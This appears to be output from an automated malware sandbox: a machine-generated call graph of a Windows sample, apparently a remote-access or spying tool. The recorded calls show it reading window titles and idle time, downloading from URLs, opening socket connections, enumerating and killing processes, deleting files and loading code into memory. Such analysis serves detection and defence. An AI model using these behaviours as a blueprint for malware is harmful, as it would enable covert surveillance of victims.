69477 4047eb 98 API calls 69477->69443 69479 405dfa 69478->69479 69480 403b60 28 API calls 69479->69480 69481 405e0d 69480->69481 69482 401fbd 28 API calls 69481->69482 69483 405e1d 69482->69483 69484 401fbd 28 API calls 69483->69484 69485 405e2c 69484->69485 69486 41afc3 28 API calls 69485->69486 69487 405e35 69486->69487 69488 405f0f 69487->69488 69489 401d64 28 API calls 69487->69489 69490 401d8c 11 API calls 69488->69490 69491 405e4f 69489->69491 69492 405f18 69490->69492 69495 401d64 28 API calls 69491->69495 69493 401eea 11 API calls 69492->69493 69494 405f21 69493->69494 69496 401eea 11 API calls 69494->69496 69497 405e63 69495->69497 69498 405f29 69496->69498 69499 410b0d 40 API calls 69497->69499 69498->69404 69500 405e73 69499->69500 69500->69488 69501 410d8d 22 API calls 69500->69501 69502 405e89 69501->69502 69503 410d8d 22 API calls 69502->69503 69504 405e9a 69503->69504 69909 10001093 69504->69909 69505 405eaf 69506 401f86 28 API calls 69505->69506 69507 405ebe 69506->69507 69508 4027ec 28 API calls 69507->69508 69509 405edd 69508->69509 69510 4027cb 28 API calls 69509->69510 69511 405ee7 69510->69511 69512 404468 61 API calls 69511->69512 69513 405ef5 69512->69513 69514 401eea 11 API calls 69513->69514 69515 405efe 69514->69515 69516 4047eb 98 API calls 69515->69516 69517 405f06 69516->69517 69518 401eea 11 API calls 69517->69518 69518->69488 69925 402c1a 69520->69925 69689 403c30 69523->69689 69528 41afd6 69526->69528 69527 401eea 11 API calls 69529 41b078 69527->69529 69531 41b048 69528->69531 69532 403b60 28 API calls 69528->69532 69538 401eef 11 API calls 69528->69538 69542 401eea 11 API calls 69528->69542 69546 41b046 69528->69546 69705 41bfa9 28 API calls 69528->69705 69530 401eea 11 API calls 69529->69530 69533 41b080 69530->69533 69534 403b60 28 API calls 69531->69534 69532->69528 69535 401eea 11 API calls 69533->69535 69536 41b054 69534->69536 69539 411bac 69535->69539 69537 401eef 11 API calls 69536->69537 69540 41b05d 69537->69540 69538->69528 69539->69443 69539->69446 69541 401eea 11 API calls 69540->69541 69543 41b065 69541->69543 69542->69528 69706 41bfa9 28 API calls 69543->69706 69546->69527 69555 411cac 69547->69555 69548 41ab38 42 API calls 69548->69555 69549 40c854 32 API calls 69549->69555 69550 401eea 11 API calls 69550->69555 69551 403b40 28 API calls 69551->69555 69552 403cbb 28 API calls 69552->69555 69553 403cdc 28 API calls 69553->69555 69554 4028cf 28 API calls 69554->69555 69555->69548 69555->69549 69555->69550 69555->69551 69555->69552 69555->69553 69555->69554 69556 401e13 11 API calls 69555->69556 69557 411dea Sleep 69555->69557 69558 4176b6 31 API calls 69555->69558 69559 411e8c Sleep 69555->69559 69560 411f2e Sleep 69555->69560 69561 411f90 DeleteFileW 69555->69561 69562 41b61a 32 API calls 69555->69562 69563 411fc7 DeleteFileW 69555->69563 69564 412019 Sleep 69555->69564 69565 412003 DeleteFileW 69555->69565 69566 412092 69555->69566 69573 41205e Sleep 69555->69573 69556->69555 69557->69555 69558->69555 69559->69555 69560->69555 69561->69555 69562->69555 69563->69555 69564->69555 69565->69555 69567 401e13 11 API calls 69566->69567 69568 41209e 69567->69568 69569 401e13 11 API calls 69568->69569 69570 4120aa 69569->69570 69571 401e13 11 API calls 69570->69571 69572 4120b6 69571->69572 69707 40b027 69572->69707 69575 401e13 11 API calls 69573->69575 69580 41206e 69575->69580 69576 4120c9 69578 401fbd 28 API calls 69576->69578 69577 401e13 11 API calls 69577->69580 69579 4120e9 69578->69579 69711 4123f7 69579->69711 69580->69555 69580->69577 69582 412090 69580->69582 69582->69572 69585 412100 69586 412125 69585->69586 69587 412274 69585->69587 69727 41aec8 69586->69727 69588 41aec8 28 API calls 69587->69588 69590 41227d 69588->69590 69592 4027ec 28 API calls 69590->69592 69594 4122b2 69592->69594 69596 4027cb 28 API calls 69594->69596 69598 4122c1 69596->69598 69597 4027ec 28 API calls 69599 412176 69597->69599 69600 4027cb 28 API calls 69598->69600 69601 4027cb 28 API calls 69599->69601 69602 4122cd 69600->69602 69603 412185 69601->69603 69604 4027cb 28 API calls 69602->69604 69605 4027cb 28 API calls 69603->69605 69606 4122dc 69604->69606 69607 412194 69605->69607 69608 4027cb 28 API calls 69606->69608 69609 4027cb 28 API calls 69607->69609 69610 4122eb 69608->69610 69611 4121a3 69609->69611 69612 4027cb 28 API calls 69610->69612 69613 4027cb 28 API calls 69611->69613 69614 4122fa 69612->69614 69615 4121b2 69613->69615 69617 4027cb 28 API calls 69614->69617 69616 4027cb 28 API calls 69615->69616 69619 4121be 69616->69619 69618 412309 69617->69618 69738 40275c 28 API calls 69618->69738 69621 4027cb 28 API calls 69619->69621 69623 4121ca 69621->69623 69622 412313 69624 404468 61 API calls 69622->69624 69736 40275c 28 API calls 69623->69736 69626 412320 69624->69626 69628 401eea 11 API calls 69626->69628 69627 4121d9 69629 4027cb 28 API calls 69627->69629 69630 41232c 69628->69630 69631 4121e5 69629->69631 69632 401eea 11 API calls 69630->69632 69737 40275c 28 API calls 69631->69737 69634 412338 69632->69634 69636 401eea 11 API calls 69634->69636 69635 4121ef 69637 404468 61 API calls 69635->69637 69638 412344 69636->69638 69639 4121fc 69637->69639 69640 401eea 11 API calls 69638->69640 69641 401eea 11 API calls 69639->69641 69642 412350 69640->69642 69643 412205 69641->69643 69644 401eea 11 API calls 69642->69644 69645 401eea 11 API calls 69643->69645 69646 412359 69644->69646 69647 41220e 69645->69647 69649 401eea 11 API calls 69646->69649 69648 401eea 11 API calls 69647->69648 69651 412217 69648->69651 69650 412362 69649->69650 69652 401eea 11 API calls 69650->69652 69653 401eea 11 API calls 69651->69653 69654 412268 69652->69654 69655 412220 69653->69655 69657 401eea 11 API calls 69654->69657 69656 401eea 11 API calls 69655->69656 69658 41222c 69656->69658 69659 412374 69657->69659 69660 401eea 11 API calls 69658->69660 69661 401e13 11 API calls 69659->69661 69662 412238 69660->69662 69663 412380 69661->69663 69664 401eea 11 API calls 69662->69664 69665 401eea 11 API calls 69663->69665 69666 412244 69664->69666 69667 41238c 69665->69667 69668 401eea 11 API calls 69666->69668 69669 401eea 11 API calls 69667->69669 69670 412250 69668->69670 69671 412398 69669->69671 69672 401eea 11 API calls 69670->69672 69673 401eea 11 API calls 69671->69673 69674 41225c 69672->69674 69675 4123a4 69673->69675 69676 401eea 11 API calls 69674->69676 69677 401eea 11 API calls 69675->69677 69676->69654 69678 4123b0 69677->69678 69679 401eea 11 API calls 69678->69679 69680 4123bc 69679->69680 69681 401eea 11 API calls 69680->69681 69682 4123c8 69681->69682 69683 401eea 11 API calls 69682->69683 69684 4123d4 69683->69684 69685 401eea 11 API calls 69684->69685 69686 4123e0 69685->69686 69687 401eea 11 API calls 69686->69687 69688 411c50 69687->69688 69688->69477 69690 403c39 69689->69690 69693 403c59 69690->69693 69694 403c68 69693->69694 69699 4032a4 69694->69699 69696 403c74 69697 402325 28 API calls 69696->69697 69698 403b73 69697->69698 69698->69438 69700 4032b0 69699->69700 69701 4032ad 69699->69701 69704 4032b6 22 API calls 69700->69704 69701->69696 69705->69528 69706->69546 69708 40b02f 69707->69708 69739 40b04b 69708->69739 69710 40b045 69710->69576 69712 412435 69711->69712 69714 412406 69711->69714 69713 412444 69712->69713 69748 4571c5b 69712->69748 69744 403b40 69713->69744 69752 410b0d 69714->69752 69719 401eea 11 API calls 69721 4120f4 69719->69721 69723 401e13 69721->69723 69725 402121 69723->69725 69724 402150 69724->69585 69725->69724 69899 402718 11 API calls _Deallocate 69725->69899 69728 41aed5 69727->69728 69729 401f86 28 API calls 69728->69729 69730 412131 69729->69730 69731 41ad46 69730->69731 69900 440c51 69731->69900 69734 401f66 28 API calls 69735 412146 69734->69735 69735->69597 69736->69627 69737->69635 69738->69622 69740 40b055 69739->69740 69742 40b060 69740->69742 69743 40b138 28 API calls 69740->69743 69742->69710 69743->69742 69745 403b48 69744->69745 69765 403b7a 69745->69765 69749 4571c6b ___scrt_fastfail 69748->69749 69774 45712ee 69749->69774 69751 4571c87 69751->69713 69816 410b19 69752->69816 69755 410d8d 69758 410dd4 69755->69758 69759 410daf 69755->69759 69756 410ea0 SetLastError 69757 410e90 69756->69757 69757->69712 69758->69756 69758->69757 69759->69758 69761 43a88c ___std_exception_copy 21 API calls 69759->69761 69764 410e60 69759->69764 69762 410e0c 69761->69762 69762->69758 69762->69762 69897 43fdd0 20 API calls 3 library calls 69762->69897 69898 4404b8 20 API calls 3 library calls 69764->69898 69766 403b86 69765->69766 69769 403b9e 69766->69769 69768 403b5a 69768->69719 69770 403ba8 69769->69770 69772 403bb3 69770->69772 69773 403cfd 28 API calls 69770->69773 69772->69768 69773->69772 69775 4571324 ___scrt_fastfail 69774->69775 69776 45713b7 GetEnvironmentVariableW 69775->69776 69800 45710f1 69776->69800 69779 45710f1 57 API calls 69780 4571465 69779->69780 69781 45710f1 57 API calls 69780->69781 69782 4571479 69781->69782 69783 45710f1 57 API calls 69782->69783 69784 457148d 69783->69784 69785 45710f1 57 API calls 69784->69785 69786 45714a1 69785->69786 69787 45710f1 57 API calls 69786->69787 69788 45714b5 lstrlenW 69787->69788 69789 45714d2 69788->69789 69790 45714d9 lstrlenW 69788->69790 69789->69751 69791 45710f1 57 API calls 69790->69791 69792 4571501 lstrlenW lstrcatW 69791->69792 69793 45710f1 57 API calls 69792->69793 69794 4571539 lstrlenW lstrcatW 69793->69794 69795 45710f1 57 API calls 69794->69795 69796 457156b lstrlenW lstrcatW 69795->69796 69797 45710f1 57 API calls 69796->69797 69798 457159d lstrlenW lstrcatW 69797->69798 69799 45710f1 57 API calls 69798->69799 69799->69789 69801 4571118 ___scrt_fastfail 69800->69801 69802 4571129 lstrlenW 69801->69802 69813 4572c40 69802->69813 69805 4571177 lstrlenW FindFirstFileW 69807 45711e1 69805->69807 69808 45711a0 69805->69808 69806 4571168 lstrlenW 69806->69805 69807->69779 69809 45711c7 FindNextFileW 69808->69809 69810 45711aa 69808->69810 69809->69808 69812 45711da FindClose 69809->69812 69810->69809 69815 4571000 57 API calls ___scrt_fastfail 69810->69815 69812->69807 69814 4571148 lstrcatW lstrlenW 69813->69814 69814->69805 69814->69806 69815->69810 69849 4105b9 69816->69849 69818 410b38 69819 410b15 69818->69819 69821 4105b9 SetLastError 69818->69821 69834 410c1f SetLastError 69818->69834 69819->69755 69823 410b5f 69821->69823 69822 410bbf GetNativeSystemInfo 69824 410bd6 69822->69824 69823->69819 69823->69822 69823->69823 69823->69834 69824->69834 69852 410abe VirtualAlloc 69824->69852 69826 410bfe 69827 410c26 GetProcessHeap HeapAlloc 69826->69827 69876 410abe VirtualAlloc 69826->69876 69829 410c3d 69827->69829 69830 410c4f 69827->69830 69877 410ad5 VirtualFree 69829->69877 69833 4105b9 SetLastError 69830->69833 69831 410c16 69831->69827 69831->69834 69835 410c98 69833->69835 69834->69819 69836 410d45 69835->69836 69853 410abe VirtualAlloc 69835->69853 69878 410eb0 GetProcessHeap HeapFree 69836->69878 69839 410cb1 _Yarn 69854 4105cc 69839->69854 69841 410cdd 69841->69836 69858 410975 69841->69858 69845 410d0f 69845->69819 69845->69836 69872 1000ad8d 69845->69872 69846 410d36 69846->69819 69847 410d3a SetLastError 69846->69847 69847->69836 69850 4105c8 69849->69850 69851 4105bd SetLastError 69849->69851 69850->69818 69851->69818 69852->69826 69853->69839 69856 4106a6 69854->69856 69857 4105fd _Yarn ___scrt_fastfail 69854->69857 69855 4105b9 SetLastError 69855->69857 69856->69841 69857->69855 69857->69856 69859 410a88 69858->69859 69864 410996 69858->69864 69859->69836 69866 410769 69859->69866 69860 410a9d SetLastError 69860->69859 69863 410a8a SetLastError 69863->69859 69864->69859 69864->69860 69864->69863 69879 43fcda 69864->69879 69868 410790 69866->69868 69867 4106d3 VirtualProtect 69869 410891 69867->69869 69868->69869 69871 41087f 69868->69871 69892 4106d3 69868->69892 69869->69845 69871->69867 69873 1000ad96 69872->69873 69874 1000ad9b dllmain_dispatch 69872->69874 69896 1000b15b GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 69873->69896 69874->69846 69876->69831 69877->69834 69878->69819 69880 44b9be 69879->69880 69881 44b9d6 69880->69881 69882 44b9cb 69880->69882 69884 44b9de 69881->69884 69890 44b9e7 _strftime 69881->69890 69883 446aff _strftime 21 API calls 69882->69883 69889 44b9d3 69883->69889 69885 446ac5 _free 20 API calls 69884->69885 69885->69889 69886 44ba11 RtlReAllocateHeap 69886->69889 69886->69890 69887 44b9ec 69888 445354 _free 20 API calls 69887->69888 69888->69889 69889->69864 69890->69886 69890->69887 69891 442200 std::_Facet_Register 7 API calls 69890->69891 69891->69890 69893 4106dd 69892->69893 69895 4106e8 69892->69895 69894 410722 VirtualProtect 69893->69894 69893->69895 69894->69895 69895->69868 69896->69874 69897->69764 69898->69758 69899->69724 69901 440c5d 69900->69901 69904 440a4d 69901->69904 69903 41ad67 69903->69734 69905 440a64 69904->69905 69907 440a9b __cftoe 69905->69907 69908 445354 20 API calls _free 69905->69908 69907->69903 69908->69907 69910 1000dafb ___std_exception_copy 21 API calls 69909->69910 69911 100010a2 69910->69911 69912 100010e3 69911->69912 69917 100010f6 69911->69917 69921 1000daab 26 API calls _abort 69911->69921 69913 100010ea 69912->69913 69922 1000daab 26 API calls _abort 69912->69922 69915 100010f1 69913->69915 69923 1000daab 26 API calls _abort 69913->69923 69915->69917 69924 1000daab 26 API calls _abort 69915->69924 69917->69505 69928 403340 69925->69928 69930 403348 69928->69930 69929 402662 69929->69404 69930->69929 69932 4038c2 69930->69932 69935 4038cb 69932->69935 69936 401eea 11 API calls 69935->69936 69937 4038ca 69936->69937 69937->69930 69939 401fbd 28 API calls 69938->69939 69940 414bbd SetEvent 69939->69940 69941 414bd2 69940->69941 69942 403b60 28 API calls 69941->69942 69943 414bec 69942->69943 69944 401fbd 28 API calls 69943->69944 69945 414bfc 69944->69945 69946 401fbd 28 API calls 69945->69946 69947 414c0e 69946->69947 69948 41afc3 28 API calls 69947->69948 69949 414c17 69948->69949 69950 414d99 69949->69950 69951 414c37 GetTickCount 69949->69951 70014 414d8a 69949->70014 69950->70014 70015 414dad 69950->70015 69953 41ad46 28 API calls 69951->69953 69952 401d8c 11 API calls 69954 4161fb 69952->69954 69955 414c4d 69953->69955 69957 401eea 11 API calls 69954->69957 70017 41aca0 GetLastInputInfo GetTickCount 69955->70017 69959 416207 69957->69959 69961 401eea 11 API calls 69959->69961 69960 414c54 69962 41ad46 28 API calls 69960->69962 69963 416213 69961->69963 69964 414c5f 69962->69964 70018 41ac52 69964->70018 69967 41aec8 28 API calls 69968 414c7b 69967->69968 69969 401d64 28 API calls 69968->69969 69970 414c89 69969->69970 69971 4027ec 28 API calls 69970->69971 69972 414c97 69971->69972 70023 40275c 28 API calls 69972->70023 69974 414ca6 69975 4027cb 28 API calls 69974->69975 69976 414cb5 69975->69976 70024 40275c 28 API calls 69976->70024 69978 414cc4 69979 4027cb 28 API calls 69978->69979 69980 414cd0 69979->69980 70025 40275c 28 API calls 69980->70025 69982 414cda 69983 404468 61 API calls 69982->69983 69984 414ce9 69983->69984 69985 401eea 11 API calls 69984->69985 69986 414cf2 69985->69986 69987 401eea 11 API calls 69986->69987 69988 414cfe 69987->69988 69989 401eea 11 API calls 69988->69989 69990 414d0a 69989->69990 69991 401eea 11 API calls 69990->69991 69992 414d16 69991->69992 69993 401eea 11 API calls 69992->69993 69994 414d22 69993->69994 69995 401eea 11 API calls 69994->69995 69996 414d2e 69995->69996 69997 401e13 11 API calls 69996->69997 69998 414d3a 69997->69998 69999 401eea 11 API calls 69998->69999 70000 414d43 69999->70000 70001 401eea 11 API calls 70000->70001 70002 414d4c 70001->70002 70003 401d64 28 API calls 70002->70003 70004 414d57 70003->70004 70026 43a5e7 70004->70026 70007 414d69 70010 414d82 70007->70010 70011 414d77 70007->70011 70008 414d8f 70009 401d64 28 API calls 70008->70009 70009->69950 70031 404915 70010->70031 70030 4049ba 81 API calls 70011->70030 70014->69952 70046 404ab1 83 API calls 70015->70046 70016 414d7d 70016->70014 70017->69960 70047 436050 70018->70047 70021 403b40 28 API calls 70022 414c6d 70021->70022 70022->69967 70023->69974 70024->69978 70025->69982 70027 43a600 _strftime 70026->70027 70049 43993e 70027->70049 70029 414d64 70029->70007 70029->70008 70030->70016 70032 4049b1 70031->70032 70033 40492a 70031->70033 70032->70014 70034 404933 70033->70034 70035 404987 CreateEventA CreateThread 70033->70035 70036 404942 GetLocalTime 70033->70036 70034->70035 70035->70032 70078 404b1d 70035->70078 70037 41ad46 28 API calls 70036->70037 70038 40495b 70037->70038 70077 404c9e 28 API calls 70038->70077 70040 404968 70041 401f66 28 API calls 70040->70041 70042 404977 70041->70042 70043 41a686 79 API calls 70042->70043 70044 40497c 70043->70044 70045 401eea 11 API calls 70044->70045 70045->70035 70046->70016 70048 41ac71 GetForegroundWindow GetWindowTextW 70047->70048 70048->70021 70065 43a545 70049->70065 70051 43998b 70071 4392de 35 API calls 2 library calls 70051->70071 70053 439950 70053->70051 70054 439965 70053->70054 70064 43996a __cftoe 70053->70064 70070 445354 20 API calls _free 70054->70070 70057 439997 70058 4399c6 70057->70058 70072 43a58a 39 API calls __Toupper 70057->70072 70061 439a32 70058->70061 70073 43a4f1 20 API calls 2 library calls 70058->70073 70074 43a4f1 20 API calls 2 library calls 70061->70074 70062 439af9 _strftime 70062->70064 70075 445354 20 API calls _free 70062->70075 70064->70029 70066 43a54a 70065->70066 70067 43a55d 70065->70067 70076 445354 20 API calls _free 70066->70076 70067->70053 70069 43a54f __cftoe 70069->70053 70070->70064 70071->70057 70072->70057 70073->70061 70074->70062 70075->70064 70076->70069 70077->70040 70081 404b29 101 API calls 70078->70081 70080 404b26 70081->70080 70082->69413 70083->69418 70084->69420 70085->69171 70086 100085d8 70087 100085e1 70086->70087 70088 100085e3 getaddrinfo 70086->70088 70087->70088 70089 100085fa FormatMessageA 70088->70089 70092 10008642 70088->70092 70090 1000862a 70089->70090 70099 100084c0 70 API calls 70090->70099 70091 10008688 FreeAddrInfoW 70092->70091 70093 10008650 socket 70092->70093 70097 10008685 70092->70097 70093->70092 70095 10008666 connect 70093->70095 70095->70097 70098 10008678 closesocket 70095->70098 70096 10008633 70097->70091 70098->70092 70099->70096 70100 1000267b 70101 100034a0 28 API calls 70100->70101 70102 10002684 70101->70102 70139 100076d0 CreateToolhelp32Snapshot 70102->70139 70104 10002693 70149 10003330 70104->70149 70106 1000269c 70108 100026b7 70106->70108 70109 100026ed 70106->70109 70154 1000daab 26 API calls _abort 70106->70154 70107 10002723 70112 10004ab0 28 API calls 70107->70112 70108->70109 70113 100026cb 70108->70113 70155 1000daab 26 API calls _abort 70108->70155 70109->70107 70110 10004160 28 API calls 70109->70110 70110->70107 70114 10002734 70112->70114 70116 100026d7 70113->70116 70156 1000daab 26 API calls _abort 70113->70156 70117 10004cc0 28 API calls 70114->70117 70119 100026e3 70116->70119 70157 1000daab 26 API calls _abort 70116->70157 70120 1000274a 70117->70120 70119->70109 70158 1000daab 26 API calls _abort 70119->70158 70122 10004e80 28 API calls 70120->70122 70124 10002762 70122->70124 70125 10004cc0 28 API calls 70124->70125 70126 10002778 CreateProcessW 70125->70126 70128 100027bc 70126->70128 70129 10002b20 38 API calls 70128->70129 70130 10002951 70129->70130 70131 10002a98 TerminateProcess WaitForSingleObject CloseHandle CloseHandle 70130->70131 70132 10003860 28 API calls 70130->70132 70133 10002acc 70131->70133 70134 1000296f 70132->70134 70136 100036c0 26 API calls 70133->70136 70135 10003860 28 API calls 70134->70135 70137 10002983 70135->70137 70138 10002ad7 70136->70138 70137->70131 70140 10007732 Process32FirstW 70139->70140 70141 10007755 70139->70141 70142 1000774e CloseHandle 70140->70142 70144 10007780 70140->70144 70141->70104 70142->70141 70143 10003970 28 API calls 70143->70144 70144->70143 70145 10004160 28 API calls 70144->70145 70146 10007844 Process32NextW 70144->70146 70159 100080a0 28 API calls std::_Xinvalid_argument 70144->70159 70145->70144 70146->70144 70148 10007860 CloseHandle 70146->70148 70148->70104 70150 1000333e 70149->70150 70153 10003353 70149->70153 70150->70153 70160 1000daab 26 API calls _abort 70150->70160 70153->70106 70159->70146 70161 43a998 70164 43a9a4 _swprintf ___BuildCatchObject 70161->70164 70162 43a9b2 70177 445354 20 API calls _free 70162->70177 70164->70162 70165 43a9dc 70164->70165 70172 444acc EnterCriticalSection 70165->70172 70167 43a9e7 70173 43aa88 70167->70173 70168 43a9b7 __cftoe std::_Locinfo::_Locinfo_ctor 70172->70167 70174 43aa96 70173->70174 70176 43a9f2 70174->70176 70179 448416 36 API calls 2 library calls 70174->70179 70178 43aa0f LeaveCriticalSection std::_Lockit::~_Lockit 70176->70178 70177->70168 70178->70168 70179->70174 70180 414dba 70195 41a51b 70180->70195 70182 414dc3 70183 401fbd 28 API calls 70182->70183 70184 414dd2 70183->70184 70185 404468 61 API calls 70184->70185 70186 414dde 70185->70186 70187 4161f2 70186->70187 70188 401eea 11 API calls 70186->70188 70189 401d8c 11 API calls 70187->70189 70188->70187 70190 4161fb 70189->70190 70191 401eea 11 API calls 70190->70191 70192 416207 70191->70192 70193 401eea 11 API calls 70192->70193 70194 416213 70193->70194 70196 41a529 70195->70196 70197 43a88c ___std_exception_copy 21 API calls 70196->70197 70198 41a533 InternetOpenW InternetOpenUrlW 70197->70198 70199 41a55c InternetReadFile 70198->70199 70203 41a57f 70199->70203 70200 41a5ac InternetCloseHandle InternetCloseHandle 70202 41a5be 70200->70202 70201 401f86 28 API calls 70201->70203 70202->70182 70203->70199 70203->70200 70203->70201 70204 401eea 11 API calls 70203->70204 70204->70203 70205 42ea1e 70206 42ea29 70205->70206 70207 42ea3d 70206->70207 70209 431fc3 70206->70209 70210 431fd2 70209->70210 70211 431fce 70209->70211 70212 43fcda 22 API calls 70210->70212 70211->70207 70212->70211 70213 1002175e 70214 10021775 70213->70214 70218 100217e3 70213->70218 70214->70218 70225 1002179d GetModuleHandleA 70214->70225 70215 10021829 70216 100217ec GetModuleHandleA 70219 100217f6 70216->70219 70218->70215 70218->70216 70218->70219 70219->70218 70220 10021816 GetProcAddress 70219->70220 70220->70218 70226 100217a6 70225->70226 70234 100217e3 70225->70234 70237 100217ba GetProcAddress 70226->70237 70228 10021829 70229 100217ec GetModuleHandleA 70233 100217f6 70229->70233 70233->70234 70236 10021816 GetProcAddress 70233->70236 70234->70228 70234->70229 70234->70233 70236->70234 70238 100217e3 70237->70238 70239 100217c4 VirtualProtect 70237->70239 70241 10021829 70238->70241 70242 100217ec GetModuleHandleA 70238->70242 70239->70238 70240 100217d3 VirtualProtect 70239->70240 70240->70238 70243 100217f6 70242->70243 70243->70238 70244 10021816 GetProcAddress 70243->70244 70244->70243 70245 4339be 70246 4339ca ___BuildCatchObject 70245->70246 70277 4336b3 70246->70277 70248 4339d1 70249 433b24 70248->70249 70253 4339fb 70248->70253 70577 433b44 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 70249->70577 70251 433b2b 70578 4426be 28 API calls _abort 70251->70578 70262 433a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 70253->70262 70571 4434d1 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 70253->70571 70254 433b31 70579 442670 28 API calls _abort 70254->70579 70257 433a14 70259 433a1a 70257->70259 70572 443475 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 70257->70572 70258 433b39 70261 433a9b 70288 433c5e 70261->70288 70262->70261 70573 43edf4 35 API calls 4 library calls 70262->70573 70278 4336bc 70277->70278 70580 433e0a IsProcessorFeaturePresent 70278->70580 70280 4336c8 70581 4379ee 10 API calls 3 library calls 70280->70581 70282 4336cd 70283 4336d1 70282->70283 70582 44335e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 70282->70582 70283->70248 70285 4336da 70286 4336e8 70285->70286 70583 437a17 8 API calls 3 library calls 70285->70583 70286->70248 70289 436050 ___scrt_fastfail 70288->70289 70290 433c71 GetStartupInfoW 70289->70290 70291 433aa1 70290->70291 70292 443422 70291->70292 70584 44ddc9 70292->70584 70294 44342b 70296 433aaa 70294->70296 70588 44e0d3 35 API calls 70294->70588 70297 40d767 70296->70297 70590 41bce3 LoadLibraryA GetProcAddress 70297->70590 70299 40d783 GetModuleFileNameW 70595 40e168 70299->70595 70301 40d79f 70302 401fbd 28 API calls 70301->70302 70303 40d7ae 70302->70303 70304 401fbd 28 API calls 70303->70304 70305 40d7bd 70304->70305 70306 41afc3 28 API calls 70305->70306 70307 40d7c6 70306->70307 70610 40e8bd 70307->70610 70309 40d7cf 70310 401d8c 11 API calls 70309->70310 70311 40d7d8 70310->70311 70312 40d835 70311->70312 70313 40d7eb 70311->70313 70314 401d64 28 API calls 70312->70314 70801 40e986 111 API calls 70313->70801 70316 40d845 70314->70316 70319 401d64 28 API calls 70316->70319 70317 40d7fd 70318 401d64 28 API calls 70317->70318 70321 40d809 70318->70321 70320 40d864 70319->70320 70322 404cbf 28 API calls 70320->70322 70802 40e937 65 API calls 70321->70802 70323 40d873 70322->70323 70324 405ce6 28 API calls 70323->70324 70326 40d87f 70324->70326 70328 401eef 11 API calls 70326->70328 70327 40d824 70803 40e155 65 API calls 70327->70803 70330 40d88b 70328->70330 70331 401eea 11 API calls 70330->70331 70332 40d894 70331->70332 70334 401eea 11 API calls 70332->70334 70336 40d89d 70334->70336 70337 401d64 28 API calls 70336->70337 70338 40d8a6 70337->70338 70339 401ebd 28 API calls 70338->70339 70340 40d8b1 70339->70340 70341 401d64 28 API calls 70340->70341 70342 40d8ca 70341->70342 70343 401d64 28 API calls 70342->70343 70345 40d8e5 70343->70345 70344 40d946 70346 401d64 28 API calls 70344->70346 70361 40e134 70344->70361 70345->70344 70804 4085b4 70345->70804 70352 40d95d 70346->70352 70348 40d912 70349 401eef 11 API calls 70348->70349 70350 40d91e 70349->70350 70353 401eea 11 API calls 70350->70353 70351 40d9a4 70614 40bed7 70351->70614 70352->70351 70358 4124b7 3 API calls 70352->70358 70355 40d927 70353->70355 70808 4124b7 RegOpenKeyExA 70355->70808 70363 40d988 70358->70363 70896 412902 30 API calls 70361->70896 70363->70351 70811 412902 30 API calls 70363->70811 70371 40e14a 70897 4112b5 64 API calls ___scrt_fastfail 70371->70897 70571->70257 70572->70262 70573->70261 70577->70251 70578->70254 70579->70258 70580->70280 70581->70282 70582->70285 70583->70283 70585 44dddb 70584->70585 70586 44ddd2 70584->70586 70585->70294 70589 44dcc8 48 API calls 4 library calls 70586->70589 70588->70294 70589->70585 70591 41bd22 LoadLibraryA GetProcAddress 70590->70591 70592 41bd12 GetModuleHandleA GetProcAddress 70590->70592 70593 41bd4b 32 API calls 70591->70593 70594 41bd3b LoadLibraryA GetProcAddress 70591->70594 70592->70591 70593->70299 70594->70593 70898 41a63f FindResourceA 70595->70898 70598 43a88c ___std_exception_copy 21 API calls 70599 40e192 _Yarn 70598->70599 70600 401f86 28 API calls 70599->70600 70601 40e1ad 70600->70601 70602 401eef 11 API calls 70601->70602 70603 40e1b8 70602->70603 70604 401eea 11 API calls 70603->70604 70605 40e1c1 70604->70605 70606 43a88c ___std_exception_copy 21 API calls 70605->70606 70607 40e1d2 _Yarn 70606->70607 70901 406052 70607->70901 70609 40e205 70609->70301 70611 40e8ca 70610->70611 70613 40e8da 70611->70613 70904 40200a 11 API calls 70611->70904 70613->70309 70905 401e8f 70614->70905 70801->70317 70802->70327 70805 4085c0 70804->70805 70806 402e78 28 API calls 70805->70806 70807 4085e4 70806->70807 70807->70348 70809 4124e1 RegQueryValueExA RegCloseKey 70808->70809 70810 41250b 70808->70810 70809->70810 70810->70344 70811->70351 70896->70371 70899 40e183 70898->70899 70900 41a65c LoadResource LockResource SizeofResource 70898->70900 70899->70598 70900->70899 70902 401f86 28 API calls 70901->70902 70903 406066 70902->70903 70903->70609 70904->70613 70906 401e94 70905->70906 71119 41569e 71120 401d64 28 API calls 71119->71120 71121 4156b3 71120->71121 71122 401fbd 28 API calls 71121->71122 71123 4156bb 71122->71123 71124 401d64 28 API calls 71123->71124 71125 4156cb 71124->71125 71126 401fbd 28 API calls 71125->71126 71127 4156d3 71126->71127 71130 411aed 71127->71130 71131 4041f1 3 API calls 71130->71131 71132 411b01 71131->71132 71133 40428c 97 API calls 71132->71133 71134 411b09 71133->71134 71135 4027ec 28 API calls 71134->71135 71136 411b22 71135->71136 71137 4027cb 28 API calls 71136->71137 71138 411b2c 71137->71138 71139 404468 61 API calls 71138->71139 71140 411b36 71139->71140 71141 401eea 11 API calls 71140->71141 71142 411b3e 71141->71142 71143 4045d5 293 API calls 71142->71143 71144 411b4c 71143->71144 71145 401eea 11 API calls 71144->71145 71146 411b54 71145->71146 71147 401eea 11 API calls 71146->71147 71148 411b5c 71147->71148

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 0041BCE3 Relevance: 115.6, APIs: 40, Strings: 26, Instructions: 140libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
